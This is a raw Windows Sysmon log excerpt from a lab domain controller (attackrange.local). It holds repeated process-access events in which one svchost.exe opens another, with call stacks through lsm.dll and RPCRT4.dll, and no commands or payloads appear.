13:29:57.920{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010133Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.920{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010132Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.920{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010131Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.920{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010130Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.920{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010129Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.920{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010128Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.920{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010127Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.920{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010126Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.920{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010125Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.920{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010124Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.920{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010123Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.920{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010122Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.920{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010121Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.904{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010120Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.904{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010119Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.904{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010118Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.904{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010117Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.904{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010116Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.904{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010115Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.904{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010114Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.904{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010113Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.904{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010112Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.904{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010111Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.904{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010110Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 